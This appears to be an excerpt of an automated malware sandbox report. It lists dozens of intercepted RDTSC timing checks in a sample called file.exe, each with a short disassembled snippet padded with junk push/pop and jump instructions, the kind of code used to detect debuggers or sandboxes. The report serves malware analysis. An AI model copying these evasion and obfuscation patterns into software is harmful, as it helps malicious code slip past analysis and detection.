Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113B4B6 second address: 113B4BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1147346 second address: 1147394 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnp 00007F12C15B7316h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jns 00007F12C15B7316h 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f ja 00007F12C15B7328h 0x00000025 jmp 00007F12C15B7322h 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F12C15B7325h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1147394 second address: 1147398 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114DAB7 second address: 114DAC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F12C15B7316h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114DAC3 second address: 114DAE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324D6h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F12C08324C6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116166E second address: 116167B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 js 00007F12C15B7318h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116167B second address: 1161681 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1161681 second address: 1161687 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116B133 second address: 116B139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116B139 second address: 116B13F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1169DB3 second address: 1169DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1169F4C second address: 1169F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1169F56 second address: 1169FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F12C08324D0h 0x0000000d push esi 0x0000000e jns 00007F12C08324C6h 0x00000014 jmp 00007F12C08324D4h 0x00000019 pop esi 0x0000001a jmp 00007F12C08324D6h 0x0000001f jne 00007F12C08324D2h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116A247 second address: 116A271 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B7322h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnl 00007F12C15B7322h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116A426 second address: 116A42C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116A42C second address: 116A432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116A432 second address: 116A456 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 jmp 00007F12C08324CEh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jo 00007F12C08324C6h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116A456 second address: 116A460 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116A460 second address: 116A466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116A466 second address: 116A46C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116E934 second address: 116E938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A9343 second address: 11A9347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A95D3 second address: 11A95E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F12C08324C6h 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A973F second address: 11A974F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F12C15B7316h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A974F second address: 11A976A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324CDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A976A second address: 11A97AA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F12C15B7316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F12C15B7325h 0x0000000f pushad 0x00000010 jmp 00007F12C15B731Fh 0x00000015 je 00007F12C15B7316h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 jp 00007F12C15B7316h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A98DE second address: 11A98E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AD12D second address: 11AD137 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F12C15B7316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AFA0C second address: 11AFA16 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F12C08324CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AFB50 second address: 11AFB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AFB54 second address: 11AFB58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AFDB4 second address: 11AFDB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AFDB9 second address: 11AFDBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AFDBF second address: 11AFDC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AFDC3 second address: 11AFDD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F12C08324C6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AFDD6 second address: 11AFDDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AFDDA second address: 11AFDE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AFDE0 second address: 11AFDF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12C15B7323h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AFDF7 second address: 11AFDFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AFDFB second address: 11AFE47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov edx, 2E3A29C1h 0x0000000e push dword ptr [ebp+1244B35Dh] 0x00000014 mov edx, 6F20426Fh 0x00000019 call 00007F12C15B7319h 0x0000001e jns 00007F12C15B7334h 0x00000024 push eax 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 push edx 0x00000029 pop edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AFE47 second address: 11AFE55 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F12C08324C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AFE55 second address: 11AFE59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AFE59 second address: 11AFE68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ebx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B10C9 second address: 11B10DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12C15B731Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B2D0C second address: 11B2D15 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B2D15 second address: 11B2D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12C15B7320h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c jp 00007F12C15B7318h 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 jmp 00007F12C15B7328h 0x0000001d push esi 0x0000001e pop esi 0x0000001f pop ecx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B28AB second address: 11B28DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F12C08324D2h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F12C08324D5h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B28DD second address: 11B28E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B28E6 second address: 11B28EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80D95 second address: 4C80D99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80D99 second address: 4C80D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80D9F second address: 4C80E44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F12C15B7322h 0x00000009 or si, E4E8h 0x0000000e jmp 00007F12C15B731Bh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F12C15B7328h 0x0000001a adc esi, 04FAF748h 0x00000020 jmp 00007F12C15B731Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 xchg eax, ebp 0x0000002a jmp 00007F12C15B7326h 0x0000002f mov ebp, esp 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov bx, 15C0h 0x00000038 pushfd 0x00000039 jmp 00007F12C15B7329h 0x0000003e add ah, FFFFFFC6h 0x00000041 jmp 00007F12C15B7321h 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80E44 second address: 4C80E4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80E4A second address: 4C80E89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B7323h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F12C15B7322h 0x00000015 xor al, FFFFFFC8h 0x00000018 jmp 00007F12C15B731Bh 0x0000001d popfd 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70D98 second address: 4C70D9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70D9C second address: 4C70DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70DA2 second address: 4C70DA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70DA8 second address: 4C70DC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F12C15B731Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70DC2 second address: 4C70DEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov eax, edx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB082A second address: 4CB0868 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 63DB3183h 0x00000008 jmp 00007F12C15B7328h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebp 0x00000011 jmp 00007F12C15B7320h 0x00000016 push eax 0x00000017 pushad 0x00000018 mov cx, dx 0x0000001b push eax 0x0000001c push edx 0x0000001d movsx ebx, ax 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB0868 second address: 4CB08C5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 push esi 0x0000000a pop edx 0x0000000b mov dx, si 0x0000000e popad 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F12C08324CCh 0x00000018 jmp 00007F12C08324D5h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F12C08324D0h 0x00000024 or ch, 00000068h 0x00000027 jmp 00007F12C08324CBh 0x0000002c popfd 0x0000002d popad 0x0000002e pop ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB08C5 second address: 4CB08C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB08C9 second address: 4CB08CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C500EE second address: 4C5015A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B7329h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F12C15B7321h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F12C15B731Eh 0x00000015 mov ebp, esp 0x00000017 jmp 00007F12C15B7320h 0x0000001c push dword ptr [ebp+04h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F12C15B7327h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5015A second address: 4C50172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12C08324D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C501A7 second address: 4C501AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C501AE second address: 4C501B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C501B3 second address: 4C501B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70AEC second address: 4C70B43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c jmp 00007F12C08324CEh 0x00000011 mov si, 5DF1h 0x00000015 popad 0x00000016 pop ebp 0x00000017 pushad 0x00000018 pushad 0x00000019 mov cx, 3B4Fh 0x0000001d mov bx, ax 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 pushfd 0x00000024 jmp 00007F12C08324CEh 0x00000029 add al, FFFFFFF8h 0x0000002c jmp 00007F12C08324CBh 0x00000031 popfd 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C705B2 second address: 4C70611 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B7329h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F12C15B7323h 0x00000012 pushfd 0x00000013 jmp 00007F12C15B7328h 0x00000018 and ax, B008h 0x0000001d jmp 00007F12C15B731Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70611 second address: 4C70635 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop edi 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70635 second address: 4C7063B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7063B second address: 4C7063F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7063F second address: 4C70689 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B731Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov si, 72E3h 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 mov ax, E50Dh 0x0000001d pushfd 0x0000001e jmp 00007F12C15B731Ah 0x00000023 and ah, 00000028h 0x00000026 jmp 00007F12C15B731Bh 0x0000002b popfd 0x0000002c popad 0x0000002d pop ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 mov ax, di 0x00000034 pushad 0x00000035 popad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70689 second address: 4C7068F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7037B second address: 4C70380 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70380 second address: 4C703BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov cx, 9133h 0x0000000f jmp 00007F12C08324D8h 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 jmp 00007F12C08324CEh 0x0000001c push eax 0x0000001d push edx 0x0000001e mov eax, 7C06ED67h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C703BF second address: 4C703E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 jmp 00007F12C15B7328h 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C703E7 second address: 4C703ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C703ED second address: 4C703F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8015A second address: 4C80160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80160 second address: 4C80179 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B731Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov bl, al 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80179 second address: 4C801B5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007F12C08324D8h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F12C08324D7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C901E9 second address: 4C901EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C901EF second address: 4C901F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C901F3 second address: 4C90235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c mov eax, edx 0x0000000e mov bx, C8F4h 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 jmp 00007F12C15B7323h 0x0000001a mov eax, dword ptr [ebp+08h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F12C15B7325h 0x00000024 rdtsc
